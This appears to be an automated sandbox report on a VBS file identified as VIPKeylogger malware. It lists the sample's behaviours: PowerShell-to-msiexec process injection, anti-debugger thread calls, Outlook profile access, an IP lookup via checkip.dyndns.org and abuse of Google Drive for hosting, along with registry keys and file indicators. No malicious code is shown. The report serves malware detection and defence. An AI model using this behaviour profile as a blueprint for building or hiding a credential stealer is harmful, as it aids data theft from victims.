Analysis Overview
SHA256
14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e
Threat Level: Known bad
The file 14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e.vbs was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-31 02:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-31 02:07
Reported
2024-10-31 02:11
Platform
win7-20240903-en
Max time kernel
149s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2336 wrote to memory of 1856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-31 02:07
Reported
2024-10-31 02:11
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
142s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4832 wrote to memory of 3096 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3360 wrote to memory of 3924 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14eb913e7c5fe08f6c5f656178f35713b605f7d0aa1c62489b3cfaf418a0c27e.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_humwqxsv.0a5.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds